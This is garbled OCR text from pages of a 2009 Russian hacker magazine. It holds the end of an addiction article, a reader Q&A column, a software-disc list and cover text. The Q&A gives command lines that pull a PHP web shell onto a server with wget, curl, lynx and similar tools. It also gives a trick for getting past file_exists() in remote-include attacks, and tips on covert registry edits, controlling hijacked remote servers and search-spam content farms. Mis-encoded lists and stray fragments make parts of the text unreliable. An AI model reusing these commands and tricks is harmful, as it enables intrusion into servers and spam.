купить тоже надо было... жаль, что не продавался по одному — пришлось 

ящик взять. Опять же, молока, мяса, консервов… разве ненужные 

вещи?». Формально — нужные, но собирался чел ведь только за пивом 

и креветками. Чтобы не оказаться в положении старшеклассницы, 

зомбированной ассортиментом гипермаркета, заранее планируй, что 

требуется купить, пиши на бумажку список «маст хев» (купил — поставь 

галочку. Нужно что-то еще? Обойдешься! Забыл вписать в список — теперь 

страдай) и ставь финансовый лимит, который ни при каких условиях 

не будешь превышать. Даже если деньги в кошельке есть. А лучше — вообще 

не бери с собой лишних денег, пусть дома лежат. z 

ЗАВИСИМОЕ РАССТРОЙСТВО 

ЛИЧНОСТИ 

Люди, отягощенные этим расстройством, несамостоятельны, 

зависимы от чужой точки зрения (которую принимают, даже осознавая 

собственную правоту, — из страха быть отвергнутыми) и 

неспособны к самостоятельному принятию решений. Часто они 

«прицепляются» к человеку, в тени которого живут, или образуют 

созависимость с другим аддиктом. Например, почему так выходит, 

что жена продолжает жить с совершенно асоциальным мужемалкоголиком, 

который ежедневно бухает, распускает руки и живет 

на ее бабло? Потому что образовалась созависимость. Своими силами 

ее разрушить трудно. 

Сам понимаешь, первейший кандидат на любую зависимость — это 

человек с соответствующим расстройством личности. Эти же люди 

(вместе со страдающими истероидными расстройствами) составляют 

львиную долю публики, зависимой от сект и полурелигиозных 

организаций (в качестве отдельной аддикции «сектозависимость» 

пока не выделяют). 

XÀÊÅÐ 04 /124/ 09 

Один из плакатов Фонда борьбы с наркотической зависимостью: «Экстази. 

Присоединитесь к уникальной лотерее, которая дает возможность 

выиграть в качестве приза ДТП» 

ЧАСТНЫЕ СЛУЧАИ 

ЗАВИСИМОСТИ ОТ ПАВ 

• Опийная наркомания. К опиатам относятся морфин (он же 

«Морфiй»), героин, омнопон, промедол и метадон. Зависимость от 

опиатов — одна из самых тяжелых, развивается довольно быстро 

— например, для морфия это, в среднем, 10 уколов, для героина — 

3-5, а то и меньше. Принимают опиаты как путем внутривенного 

вштыривания, так и — вдыхая порошок (героин) или закидываясь 

таблетками (кодеин, который входит в состав средств от кашля). 

Начинающих наркоманов привлекает приятный «приход» с ощущением 

«теплой волны и удара в голову» и, собственно, состояние 

опьянения — ощущение удовольствия, легкости мыслей и чувств, 

мелькание приятных образов. Это да, привлекает. Обламывают последствия 

— тоскливо-злобное настроение после наркотического 

эпизода, развивающаяся психическая и физическая зависимость. 

• Производные конопли. Травку, гашиш и гашишное масло, как 

известно, курят и употребляют в пищу. Для этой наркоты имеет 

большое значение «установка на кайф», случайно выкуренная 

папироска часто не вызывает никаких ощущений. Зависимость от 

нее развивается медленно, первой — психическая, а через 2-3 года 

следует и физическая. Поэтому большинство употребляющих так и 

остаются в группе эпизодических потребителей. 

• Кокаин. Ватсон, подайте мне мой несессер с кокаином, в Лондоне 

осталось совсем мало настоящих преступлений! Действие кокаина 

— стимулирующее и возбуждающее (да-да, в том числе и сексуально 

возбуждающее!). Довольно быстро развивается психическая 

зависимость, следом идет физическая. Кокаин дорог, а здоровье 

поправлять надо (после опьянения неизбежна посткокаиновая 

депрессия). Деньги наш подопытный спускает быстро, в ход идет 

барбитура, алкоголь, транки и антидепрессанты. В общем, не очень 

это все полезно для организма. 

• Психостимуляторы. Экстази (love drug), фенамин, метафетамин, 

эфедрин. Честное слово, недавно в каком-то мужском журнале видел 

гайд по злоупотреблению экстази. Отличная идея, экстази имеет 

двойное действие — оказывает стимулирующее-возбуждающее 

и галлюциногенный эффект. Экстази часто бодяжат с другими веществами 

или просто разбавляют побелкой. В литературе описаны 

случаи внезапной смерти от острой почечной недостаточности или 

кровоизлияния в мозг. 

123

units 

МАГ 

/ ICQ 884888 / 

FAQ UNITED: 

Q: Существует куча php-классов для синонимизации 

(замены отдельных слов — синонимами) 

текста. А нет ли сервисов для онлайнсинонимизации? 

A: Разнообразить свой дорвейный текст 

синонимами, что называется, не отходя от 

кассы, можно на ресурсах turnkeyhero.com/ 

replacer_tester.php или spinnertool.com, которым 

пользуюсь лично я. А вот и пример онлайнсинонимизации. 

Передаем на вход сервису 

следующий текст: 

You Can Quickly And Easily Rewrite 

Your Content And Drive More And 

More Ultra-Responsive Targeted 

Traffic To Your WebSite — Even If 

You Are A Newbie! 

И получаем в ответ уникальный тест, созданный 

автоматическим копирайтером: 

You Can Quickly And Colloquialism 

Writing Your Accumulation And 

Propulsion More And More Ultra- 

Responsive Targeted Assemblage To 

Your WebSite — Even If You Are A 

Newbie! 

Неплохо для бесплатного сервиса, не правда 

ли? 

Q: Как создать автонаполняемый блог? 

A: Обычно для всяческих WordPress-блогов 

используются плагины, которые оперируют 

чужими RSS-лентами, преобразуя их в посты. 

Как быть, если ты создаешь блог на blogspot. 

com, wordpress.com и иже с ними? Все очень 

просто! Понадобится всего лишь такая фича 

блогохостингов, как постинг по e-mail, все те же 

стыренные RSS-ленты, а также сервис вроде 

www.rss2email.ru. 

Итак, создавай новый блог, находи постинг по 

e-mail (на блогспоте ты получишь специальный 

e-mail, куда нужно будет присылать посты, а на 

вордпрессе — должен будешь ввести параметры 

доступа к любому своему ящику). Затем иди 

на www.rss2email.ru и добавляй новые ленты 

новостей со своим мылом. Через некоторое 

время с удивлением увидишь, что твой новоявленный 

блог, как по волшебству, растет и 

наполняется :). 

Не надо забывать и о замечательном сервисе 

Yahoo Pipes (pipes.yahoo.com), позволяющем 

творить чудеса с различными RSS-потоками, 

а также просто информацией с произвольных 

веб-страниц, как угодно манипулируя данными. 

Причем, для этого не обязательно быть гуру в 

программинге и скрипто-строении: для кодинга 

используется графический подход, а именно 

— набор элементов, которые надо разместить 

на рабочем поле, нужным образом связать и 

задать параметры. Подробнее читай в статье 

«Интернет на одной странице» (z#110). 

Q: Подскажи, как определить, находится ли 

мой дедик за натом? 

A: Очень просто! Заходи в «Start Run 

ipconfig» и смотри вывод команды. Дедик 

находится за NAT, если висит на одном из IPдиапазонов: 

10.0.0.0 — 10.255.255.255 

172.16.0.0 — 172.31.255.255 

192.168.0.0 — 192.168.255.255 

Q: Как обойти проблему дисконнекта через n 

минут на моем дедике? 

A: Допустим, твой логин на дедик Lopa. Тогда 

для тебя неприятность с вырубанием сессии 

лечится достаточно легко: My Computer Правая 

кнопка мыши Manage — Local users and 

groups Users Твой акк Правая кнопка 

XÀÊÅÐ 04 /124/ 09 

124

units 

мыши Properties Sessions. На этой вкладке 

везде ставь «Never». Также проверь в Run 

tscc.msc RDP следующие значения вкладок: 

net accounts /forcelogoff:no 

net accounts /maxpwage:unlimited 

Q: Хочу создать свою блого-социальную сеть 

наподобие Хабра. Как проще это сделать? 

A: Если не хочешь заморачиваться с написанием 

собственного движка, то могу посоветовать 

готовое бесплатное решение LiveStreet (http:// 

livestreet.ru) от программера Максима Мжельского 

(aka ort). 

Основные возможности движка: 

• Èñïîëüçîâàíèå UTF-8 

• Âåäåíèå ïåðñîíàëüíûõ áëîãîâ 

• Âîçìîæíîñòü ñîçäàíèÿ êîëëåêòèâíûõ 

áëîãîâ 

• Ñèñòåìà ðåéòèíãîâ áëîãîâ, òîïèêîâ, 

êîììåíòàðèåâ, ïîëüçîâàòåëåé 

• Ñèñòåìà ãîëîñîâàíèÿ çà áëîãè, òîïèêè, 

êîììåíòàðèè, ïîëüçîâàòåëåé 

• Âîçìîæíîñòü äîáàâëÿòü òîïèêè â 

èçáðàííîå 

• Àâòîïîäñòàíîâêà òåãîâ 

• Êîëëåêòèâíàÿ âíóòðåííÿÿ ïî÷òà 

• Ñèñòåìà êîíòðîëÿ äîñòóïà (ACL) ê 

ðàçíûì âîçìîæíîñòÿì ñåòè (ñîçäàíèå 

áëîãà, ãîëîñîâàíèå è ò.ï.) 

• Âîçìîæíîñòü ñîçäàòü çàêðûòûé ñàéò 

• Ñèñòåìà èíâàéòîâ 

• Òîïèêè-ññûëêè 

• Òîïèêè-îïðîñû 

• Àäìèíèñòðèðîâàíèå ñâîèõ áëîãîâ 

• Íàçíà÷åíèå ìîäåðàòîðîâ áëîãîâ 

• Íàñòðîéêè îïîâåùåíèé íà e-mail 

А если ты решил создать тематическое сообщество 

и сделать его похожим, скажем, на 

VKontakte.ru, то можешь использовать часть 

движка. API для создания социалки, а также 

пример подобного ресурса бесплатно доступны 

на сайте userapi.com. 

Q: Нашел удаленный инклуд в одном замечательном 

скрипте, но все дело портит функция 

file_exists(). Есть ли способы ее обойти? 

A: Такие способы действительно есть! Раскопал 

их один из лидеров Античата .Slip (за что 

ему пожизненный респект!). Все дело в том, 

XÀÊÅÐ 04 /124/ 09 

что, начиная с PHP 5.0.0, функция file_exists() 

может работать с упаковщиками урл. Не только 

с «ftp://», но так же и с «php://memory», «php:// 

temp», «ssh2.sftp://». 

Следующий скрипт выведет нам true! 

 

Подробнее об этом векторе атак на веб-приложения 

советую прочитать в топике .Slip’а: 

http://forum.antichat.ru/thread99589.html. 

Q: Скачал с какого-то сайта дизайн в psd. Как 

бы теперь преобразовать его в css и html? 

Платить верстальщикам не хочу. 

A: Попробуй бесплатный онлайн-сервис http:// 

www.psd2cssonline.com. 

Для начала проверь в фотошопе, соответствует 

ли твой дизайн следующим требованиям 

сервиса: 

1. Дизайн не изобилует слоями. 

2. В дизайне используются только 8-битные 

RGB пикчи (16-битные и выше не поддерживаются). 

3. В дизайне отсутствуют невидимые слои. 

4. Psd-файл с дизайном весит не более 4 метров 

(8 — для платных юзеров). 

Расширенную версию требований на английском 

языке смотри тут — www.psd2cssonline. 

com/node/9. 

Все нормально и соответствует этим пунктам? 

Тогда смело загружай в форму «Upload your 

PSD» в шапке сайта свой многострадальный 

дизайн и наслаждайся результатом! 

Q: Какие еще существуют никсовые качалки, 

полезные для нашего брата (кроме curl и 

wget)? 

A: Вот простейший синтаксис всех распространенных 

качалок для никсов: 

lynx: lynx -source "http://site. 

com/shell.txt" > /tmp/shell.php 

links: links -source "http://site. 

com/shell.txt" > /tmp/shell.php 

wget: wget -O /tmp/shell.php 

http://site.com/shell.txt 

GET: GET http://site.com/perl.txt 

> /tmp/shell.php 

fetch: fetch -o shell.php http:// 

site.com/shell.txt 

curl: curl --output shell.php 

http://site.com/shell.txt 

Q: Я забыл свой админский пассворд на Винду! 

Что делать? 

A: Используй тулзу Offline NT Password & 

Registry Editor (home.eunet.no/~pnordahl/ 

ntpasswd). 

Из особенностей утилиты: 

• Ñáðàñûâàåò ïàðîëü ëþáîãî þçåðà, 

êîòîðûé èìååò âàëèäíûé àêêàóíò íà 

òâîåé ñèñòåìå Windows NT/2k/XP/ 

Vista 

• Ìîæíî íå çíàòü ñòàðûé ïàðîëü äëÿ 

óñòàíîâêè íîâîãî 

• Óòèëèòà ðàáîòàåò offline, òàê 

÷òî òû äîëæåí òîëüêî ðåáóòíóòü ñâîé 

êîìïüþòåð ñ ôëîïèêà, CD èëè êàêîéíèáóäü 

äðóãîé ñèñòåìû 

• Óòèëèòà ñìîæåò íàéòè è ðàçáëîêèðîâàòü 

çàëî÷åííûå èëè îòêëþ÷åííûå 

àêêàóíòû 

Удачи! 

Q: Хочу организовать свой сервис для восстановления 

md5-хешей, но, в то же время, 

не хочется заниматься генерацией радужных 

таблиц. Где бы скачать уже готовые 

таблицы? 

A: В формате торрентов их можно скачать 

здесь: http://rainbowtables.shmoo.com. 

Сервис предлагает следующие rainbow tables: 

1. Большие буквы латинского алфавита; 

2. Большие буквы латинского алфавита + 

цифры; 

3. Большие буквы латинского алфавита + цифры 

+ спецсимвол. 

Также хочу порекомендовать софт для генерации 

данных таблиц (если ты не захочешь их качать) 

— RainbowCrack 1.2 (http://www.antsight. 

com/zsl/rainbowcrack). 

А вот примерные размеры различных rainbow 

таблиц: 

[ABCDEFGHIJKLMNOPQRSTUVWXYZ] — 610 

MB (8353082582 çàïèñåé); 

[ABCDEFGHIJKLMNOPQRSTUVWXYZ012345 

6789] — 3 GB (80603140212 çàïèñåé); 

125

units 


56789!@#$%^&*()-_+= ] - 24 

GB (915358891407 çàïèñåé); 


123456789!@#$%^&*()-_+=~'[] 

{}|\:;"',.?/ ] — 64 GB 

(7555858447479 çàïèñåé); 

[abcdefghijklmnopqrstuvwxyz012 

3456789] — 36 GB (2901713047668 

çàïèñåé). 

Q: Замучался уже обновлять свой ICQ-клиент 

из-за постоянных смен протокола AOL’ом. 

Как оставаться онлайн, несмотря на все их 

козни? 

A: Если ты любишь пользоваться альтернативными 

асечными клиентами и ни в коем случае 

не хочешь ставить официальную ICQ 6.5 (что 

правильно), то могу посоветовать один из способов 

от админа Асечки .pin’а. Итак: 

1. Заходи на http://ru.toonel.net и скачивай 

Windows-версию клиента, не требующую Java 

(вес 2.0 MB); 

2. Устанавливай и запускай скачанную программу; 

3. Заходи на вкладку «Порты», удаляй все, 

кроме «127.0.0.1»; 

4. Выделяй «127.0.0.1» и проверь поле «локал. 

порт». Если цифра 8090 тебя устраивает — оставляй; 

нет — меняй на любой другой удобный 

тебе порт; 

5. Теперь заходи в свой асечный клиент, в 

раздел с настройками сети, устанавливай 

галку «Использовать прокси», тип «https», 

хост «localhost», порт 8090 (ну или тот, который 

ты выбрал раньше). Дальше — отмечай галку 

«Использовать DNS на прокси» и сохраняй 

новые настройки; 

6. Перелогинивайся и наслаждайся общением. 

P.S. За все обновления протокола на мой любимый 

клиент &RQ ни единого раза не приходило 

злосчастное сообщение от UIN #1, — чего не 

скажешь о QIP и Miranda. Так что советую попробовать 

«крыску» (http://andrq.org). 

Q: Не могу зайти на дедик! При входе пишет, 

что залогинено максимальное число пользователей! 

Как быть? 

A: Тебе необходимо зайти на дед под админской 

учеткой с помощью специального ключа 

mstsc: 

mstsc /admin (íàïðèìåð, Windows XP 

SP3); 

mstsc /console (íàïðèìåð, Windows 

XP SP2 è äðóãèå, áîëåå ñòàðûå, âåðñèè 

Âèíäû). 

Зайдя на дедик, вызывай Run taskmgr, заходи 

во вкладку с пользователями и разлогинивай 

любого не понравившегося юзера :). 

P.S. Описанная тобой в сабже неприятность 

(максимальная одновременная работа только 

двух пользователей) обычно наблюдается у 

нелицензированной серверной Винды. Вывод: 

задумайся над лицензированием. 

Q: Подскажите, возможно ли включить виртуализацию 

Hyper-V для Windows7. 

A: Без проблем! Алгоритм такой: 

1. Сначала выкачиваем Remote Admin Tools с 

сайта Microsoft: technet.microsoft.com/en-us/ 

library/cc780654.aspx. 

2. После установки заходим в «Control Panel 

Programs and Features» и отключаем «Turn 

Windows features on or off». 

3. Непосредственно включаем Hyper-V через 

«Remote Server Administration Tools Role 

Administration Tools Hyper-V Tools». 

Q: Можно ли через PowerShell внести изменения 

в реестр так, чтобы не появились 

сообщения regedit’а? Есть необходимость 

выполнить некоторые действия удаленно 

через шелл и скрытно от пользователя. 

A: Легко, — причем PowerShell предоставляет 

намного больше возможностей, нежели 

обычные .REG-файлы. В следующем примере 

мы добавим в раздел HKEY_LOCAL_ 

MACHINE\SOFTWARE\Microsoft\Windows NT\ 

CurrentVersion\IniFileMapping\Autorun.inf ключ 

@=»@SYS:DoesNotExist», отключив автозагрузку 

в системе (подробнее — читай в прошлом 

номере статью «Вакцина для флешки»). Перед 

добавлением мы проверим, чтобы такого ключа 

еще не было в системе. 

function Disable-AutoRun 

{ 

$item = Get-Item ' 

"REGISTRY::HKEY_LOCAL_ 

MACHINE\Software\Microsoft\ 

Windows NT\CurrentVersion\ 

IniFileMapping\AutoRun.inf" ' 

-ErrorAction 

SilentlyContinue 

if (-not $item) { 

$item = New-Item 

"REGISTRY::HKEY_LOCAL_MACHINE\ 

Software\Microsoft\Windows NT\ 

CurrentVersion\IniFileMapping\ 

AutoRun.inf" 

} 

Set-ItemProperty $item.PSPath 

"(default)" "@SYS:DoesNotExist" 

} 

Q: Хочу изучить работу одного хитрого девайса, 

который подключается к компьютеру по 

USB. Поэтому такой вопрос: как проще всего 

отснифать весь трафик и передаваемые 

данные по портам USB? 

A: Если речь идет о Винде, то есть сразу несколько 

решений: USBTrace (www.sysnucleus. 

com), USB Monitor Professional (www. 

hhdsoftware.com), USBSpy 2.0 (www.everstrike. 

com/usb-monitor). Одна загвоздка — они 

платные. В случае с линуксом пользоваться 

шароварными или крякнутыми прогами не 

придется, потому что все необходимое есть 

уже в самой системе. В ядре доступен модуль 

usbmon, который существует испокон веков и 

как раз отвечает за снифинг USB-шины. Вывод 

этого драйвера можно просмотреть хоть через 

консоль, — если примонтировать debugfs и 

insmod’ить модуль usbmon: 

mount -t debugfs none_debugs /sys/ 

kernel/debug 

modprobe usbmon 

Для просмотра USB-трафика понадобится не 

более чем одна команда cat: 

cat /sys/kernel/debug/usbmon/1u 

Все данные идут в виде ASCII дампа, который 

очень легко пропарсить. Впрочем, есть и другой 

хинт. Известная библиотека Libpcap также 

поддерживает формат usbmon, а, значит, можно 

снимать USB-трафик построенным на ней 

снифером tcpdump. Более того — благодаря 

этому можно получать и просматривать данные 

в удобном графическом интерфейсе Wireshark 

(www.wireshark.org). 

Q: Как объединить движки разных браузеров 

в одной программе, чтобы отследить как 

рендерятся страницы в каждом из них? 

А: Сходу могут назвать пару вариантов. 

1. Использовать Firefox с дополнением IE 

Tab (ietab.mozdev.org) для браузера Internet 

Explorer и OperaView (operaview.mozdev.org) — 

соответственно, для Opera. 

2. Заинсталить программу от японских программеров 

Lunascape, которая объединяет в 

себе три движка для рендеринга веб-страниц 

— Trident (Internet Explorer), Gecko (Mozilla 

Firefox) и WebKit (Safari, Google Chrome). Это 

решение бесплатно можно скачать с www. 

lunascape.tv. 

Q: Как определить разрядность .EXE или .DLL 

(т.е. тип процессора, для которого скомпилирован 

файл)? 

A: Первый вариант — воспользоваться сборщиком 

из поставки Visual Studio: 

link.exe /dump /headers 

У Microsoft существует небольшая утилита 

filever.exe (http://support.microsoft.com/ 

kb/913111), которая выдает как раз то, что нужно, 

о любом бинарнике: 

filever.exe z 

126 

XÀÊÅÐ 04 /124/ 09

x 

№ 04(124) АПРЕЛЬ 2009 

>>WINDOWS 

>Dailysoft 

7-Zip 4.65 

AIMP 2.51 

Autoruns 9.40 

DAEMON Tools Lite 4.30.3 

Download Master 5.5.10.1163 

FarPowerPack 1.15 

FileZilla Client 3.2.3.1 

K-Lite Mega Codec Pack 4.75 

Miranda IM 0.7.17 

Mozilla Firefox 3.0.8 

Notepad++ 5.3.1 

Opera 9.64 

PuTTY 0.60 

QIP Infium RC4 Build 9030 

Skype 4.04.0 

Total Commander 7.04a 

Unlocker 1.8.7 

XnView 1.96 

>Development 

CodeLobster PHP Edition 3.0 

CollabNetSubversion 1.6.0-7 

E-TextEditor 1.0.30 

Intype Alpha 0.3.1.547 

Titanium SDK 0.3 

TortoiseSVN 1.6.0 

>Games 

PCSX2 0.9.6 

>Misc 

Eyeskeeper 2.0 

f.lux 

Jedi Concentrate 

Jedi Window Dock 

NiftyWindows 0.9.3.1 

OpenWithView 1.02 

Process Blocker 0.5b 

TaggedFrog 0.8.1 

Tudumo 1.1.1.25 

UbitMenu 

Workrave 1.9.0 

>Multimedia 

AAA Logo 2009 3.0 

CamSpace 8.1 

IKEA Home Planner 

iTunes 8.1 

LastFM 1.06 

LiberTV 1.4.0.0 

Microsoft WorldWide Telescope 

Random MixTape Maker 1.8.27.73 

SumatraPDF 0.9.3 

TrackMe 

Tunatic 1.0.1b 

Навигатор 

>Net 

CCNA Network Visualizer 6.0 

Cookienator 2.5.32 

Google Chrome 2.0.172.0 

HamachiSetup 1.0.3.0 

Iconix 

IE7Pro 2.4.5 

Internet Explorer 8.0 

Lunascape 5 RC1 

Mikogo 

Opera Turbo alpha 

qutIM 0.2a 

RDP Manager 

The Favorite Start Page 1.77 

TightVNC 1.3.10 

X-Lite 3.0 

Yoics for Windows 2.6.086 

Плагины для Firefox: 

CoolPreviews 2.7.2 

DOM Inspector 2.0.3 

Firebug 1.3.3 

Flashblock 1.5.9 

FoxyProxy 2.8.14 

HackBar 1.3.2 

NoScript 1.9.1.4 

SQL Inject Me 0.4.0 

Tamper Data 10.1.0 

Torbutton 1.2.1 

Web Developer 1.1.6 

XSS Me 0.4.0 

>Security 

ExpanDrive 1.8.3 

FileFuzz 

Online Solutions Security Suite 

0.8 Beta 

Panda USB Vaccine 1.0.0.19 

Swish 0.2.1.9 

SysAnalyzer 

Wireshark 1.0.6 

>System 

Avira AntiVir Personal 9 

Bill2's Process Manager v3.3.0.1 

Drive Backup 9.0 Express 

FBackup 4.1 

HD_Speed 1.5.3.64 

KDE 0.9.5-0 

MONyog MySQL Monitor and Advisor 

3.0.4 

MySQL 6.0 Alpha 

Perfgraph 3.0 

PortableApps.com Suite 1.5.2 

RadarSync 2009 

Revo Uninstaller 1.80 

SQLyog 8.04 

>>UNIX 

>Desktop 

2ManDVD 0.6.2 

AcidRip 0.14 

Archimedes 0.52.0 

Avidemux 2.4.4 

DigiKam 0.10 

DVDStyler 1.7.2 

Exaile 0.2.14 

FBReader 0.10.5 

Ffmpeg 0.5 

Gnome 2.26 

GPicView 0.1.11 

Intipunku 0.4 

Jajuk 1.7.1 

Medusa4 3.1.1 

Octave 3.0.3 

OpenOffice.org 3.0.1 

PeaZip 2.5.1 

Perl Audio Converter 4.0.5 

Picasa 3.0 beta 

sK1 0.9.0 

SongBird 1.1.1 

Sound Juicer 2.26.0 

Xneur 0.9.3 

Xvidcap 1.1.7 

>Devel 

Adventure PHP Framework 1.8 

Anjuta IDE 2.26 

bashdb 4.0.0.2 

DDD 3.3.12 

EiffelStudio 6.3 

IntellijIDEA 8.1 

MonoDevelop 1.9.3 

Nasm 2.06rc8 

Pango 1.24.0 

Parrot 1.0 

QDevelop 0.27.4 

Qt 4.5.0 

Qt Creator 1.0 

RapidSVN 0.9.8 

Ruby 1.9.1 

Subversion 1.6.0 

Titanium 

Все для Ruby - Aptana Studio 1.2.5 

Все для Ruby - Arcadia 0.6.0 

Все для Ruby - FreeRIDE 0.9.6 

Все для Ruby - IronRuby 0.3 

Все для Ruby - JRuby 1.2.0 

Все для Ruby - korundum 3.5.5 

Все для Ruby - qt4-qtruby 2.0.3 

Все для Ruby - Rails 2.3.2 

Все для Ruby - RubyGems 1.3.1 

Все для Ruby - wxRuby2 2.0.0 

>Games 

Neverball 1.5.0 

OpenArena 0.7.1 

>Net 

Amsn 0.97.2 

bareFTP 0.2.1 

Ekiga 3.2.0 

Gajim 0.12.1 

LFTP 3.7.11 

Mozilla Firefox 3.0.8 

Mozilla Thunderbird 2 

Opera 9.64 

Opera Turbo 10.0.4166 Alpha 

Pidgin 2.5.5 

Psi 0.12 

QuickSynergy 0.9.0 

qutIM 0.2 alpha 

Smuxi 0.6.3 

Synapse IM 

Synergy 1.3.1 

Tightvnc 1.3.10 

Tkabber 0.11.1 

>Security 

Automated Password Generator 

2.2.3 

ClamAV 0.95 

Epicwebhoneypot 1.0c 

Fail2ban 0.8.3 

Ferm 2.0.5 

GnuPG 2.0.11 

iodine 0.5.1 

ITS4 Security Scanner 4-1.1.1 

m0n0wall 1.3b15 

Nmap 4.76 

OpenVAS 2.0 

RogueScanner 2.6.0.0 

SILC 1.1 

Snare 1.5.0 

Strongswan 4.2.13 

UnHash 1.0 

Unhide 

Wireshark 1.0.6 

>Server 

Apache 2.2.11 

ASSP 1.4.3.1 

Asterisk 1.6.0.6 

Bacula 2.4.4 

DBMail 2.3.5 

djbdns 1.05 

Dnstop 2009.01.28 

Dovecot 1.2 beta4 

Icecast 2.3.2 

MediaTomb 0.11 

Mongoose 2.4 

PostgreSQL 8.3.7 

Postoffice 1.4.10 

TFTP Server 1.6 

Unbound 1.2.1 

VideoLAN Server 0.5.6 

Vino 2.26.0 

>System 

Apcupsd 3.14.5 

ATI Radeon Linux Display Drivers 9.2 

Cobbler 1.4.3 

Foremost 1.5.5 

LDAP Account Manager 2.5.0 

Lynis 1.2.4 

NVClock 0.8 

nVidia Linux Display Driver x86 

180.29 

PCSX2 0.9.6 

Photorec 6.10 

Qemu 0.10.1 

rovclock 0.6e 

>X-distr 

BackTrack 4 beta 

Damn Vulnerable Linux 1.5 

nUbuntu 8.12 

STD 0.1 

ПОЛНЫЙ АНАЛИЗ ПРИВАТНЫХ БАГОВ WORDPRESS СТР. 52 

ЖУРНАЛ ОТ КОМПЬЮТЕРНЫХ ХУЛИГАНОВ 

www.xakep.ru 

АПРЕЛЬ 04 (124) 2009 

ДЕНЬ ГЕЙМЕРА 

WWW.GAMER-CITY.RU 

СТР. 4 

Loveletter 

2 

Code red 

3 

PC27 

4 

1 

Nimda 

Melissa 

Sasser 

Slammer 

6 

5 

J3 

ЛУЧШИХ 

ВИРУСОВ 

ИСТОРИЯ ЗЛА 

1999-2009 

СТР. 20 

Storm 

9 

Warezov 

8 

PC27 adaptor 

7 

Mebroot 

Sony rootkit 

10 


БЕЗ GPS 

АЛЬТЕРНАТИВНЫЕ 

СПОСОБЫ 

ОПРЕДЕЛЕНИЯ 

КООРДИНАТ 

СТР. 26 



НОВЫЙ ПУТЬ 

ДЛЯ ЗАЩИТЫ 

ДАННЫХ В БД 

СТР. 32 

АТАКА 

ТВИТТЕРА 

КАК СПАМЯТ 

TWITTER 

СКРИПТАМИ НА 

PYTHON’E 

СТР. 88

http:// 

WWW2 

ДЛЯ СЪЕМКИ 

СКРИНКАСТОВ 

SCREENTOASTER 

WWW.SCREENTOASTER.COM 

Это вещь! Еще недавно я сильно негодовал, что все толковые средства 

для съемки и монтажа скринкастов платные, а тут на тебе — нашелся 

совершенно бесплатный, грамотный инструмент, и, к тому же, работающий 

онлайн! ScreenToaster позволяет снять ролик со всего экрана (Linux, 

Windows, Mac) или выбранной части, сопровождать видео аудиокомментариями, 

выполнить простой монтаж после съемки, добавить субтитры. 

А результат? Очень качественный ролик в SWF, который не только можно 

скачать, но и сразу захостить на разных сервисах! 

QUAKE LIVE 

WWW.QUAKELIVE.COM 

QUAKE3 В ОКНЕ 

БРАУЗЕРА 

Когда-то давно я сильно извращался, чтобы запустить Quake3 на древнем 

Pentium’е без 3d-ускорителя и добился даже скорости в 2 FPS. :) А что 

сегодня? Удальцы iD Software, которым, кстати, большой респект за все 

три версии шутера, взяли да и сделали онлайн-версию любимой квачи! 

Да, теперь побегать с шотганом и пострелять приятелей можно прямо из IE 

или Firefox’а. Для этого автоматически скачивается специальный плагин, 

который подгружает текстуры, карты, запоминает конфиг и т.д. Получаем 

убойную связку — клон Q3 в окне браузера плюс социальная сеть для поклонников 

шутера. И каюсь, что не сказал ранее: вовсю рубился в Quake Live 

еще на стадии бета-тестирования. 

ДЛЯ 

СИНХРОНИЗАЦИИ 

ФАЙЛОВ МЕЖДУ 

РАЗНЫМИ 

КОМПЬЮТЕРАМИ 

AUDIOTAG.INFO 

WWW.AUDIOTAG.INFO 

СЕРВИС 

ДЛЯ 

РАСПОЗНАВАНИЯ 

МУЗЫКИ 

Скажите: а жива ли еще передача «Угадай мелодию»? Вот если б кому-то 

из участников взбрело в голову заюзать сервис AudioTag, то остальные, 

вероятно, остались бы не у дел. Отныне не надо быть большим меломаном, 

чтобы узнать название композиции — достаточно загрузить отрывок 

в 10-40 секунд на этот сервис. AudioTag.info сравнит его со своими 

сэмплами в базе и тут же выдаст ответ. Любые подсунутые ей композиции 

она определяла на раз-два. Завалить не удалось даже редким саундтреком: 

после этого я сдался. 

MICROSOFT LIVE SYNC 

WWW.FOLDERSHARE.COM 

Если ты по-прежнему пересылаешь файлы себе по email, чтобы работать 

с последней версией на разных компьютерах, или, караул, — таскаешь их 

на флешке, знай: этот сервис для тебя! Ребята из компании Foldershare, 

ныне купленной Micrsoft, создали отличный инструмент для прозрачной 

синхронизации файлов между несколькими компьютерами. Причем, 

необязательно это должны быть только твои системы: крайне удобно 

использовать Live Sync для совместной работы вместе с друзьями! 

128 

XÀÊÅÐ 04 /124/ 09

ÃÂ›ÃÂ£ÃÂ§ÃÂ¨ÃÂ˜ÃÂ¥ ÃÂ’ÃÂ˜ÃÂ ÃÂ£ÃÂ¡ÃÂžÃÂ’ - Xakep Online

Create successful ePaper yourself

Delete template?

Save as template?

ÃÂ›ÃÂ£ÃÂ§ÃÂ¨ÃÂ˜ÃÂ¥ ÃÂ’ÃÂ˜ÃÂ ÃÂ£ÃÂ¡ÃÂžÃÂ’ - Xakep Online